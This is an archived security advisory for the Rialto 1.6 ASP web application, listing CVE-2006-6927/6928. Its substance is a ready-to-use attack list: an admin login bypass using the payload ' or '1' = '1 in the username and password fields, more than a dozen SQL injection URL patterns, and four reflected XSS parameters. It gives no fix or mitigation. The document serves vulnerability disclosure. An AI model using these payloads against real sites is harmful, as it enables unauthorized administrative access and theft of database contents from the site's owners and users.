Rialto 1.6[admin login bypass & multiples injections sql]

2007.01.15

Credit: laurent gaffi & benjamin moss

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-6928 | CVE-2006-6927

CWE: N/A

vendor site: http://www.grandora.com/
product : Rialto 1.6 
bug:multiples injection sql , login bypass , xss 
risk : high !

admin login bypass :
/admin/default.asp 
username:    ' or '1' = '1
passwd:      ' or '1' = '1

injection sql :
/listfull.asp?ID='[sql]
/listmain.asp?cat='[sql]
/printmain.asp?ID='[sql]
/searchkey.asp?Keyword='[sql]
/searchmain.asp?I1=1&area='[sql]
/searchoption.asp?I12=1&cat='[sql]
/searchmain.asp?I1=1&area=all&cat='[sql]
/searchoption.asp?I12=1&cat=all&area='[sql]
/searchkey.asp?Keyword=1&I1=1&searchin='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1='[
sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1=0&
acreage2=.5&squarefeet1='[sql]

xss get :
/listmain.asp?cat=[xss]
/searchkey.asp?Keyword=[xss]
/searchmain.asp?I1=1&area=all&cat=[xss]
/forminfo.asp?refno=[xss]

laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Rialto 1.6[admin login bypass & multiples injections sql]

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Rialto 1.6[admin login bypass & multiples injections sql]

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.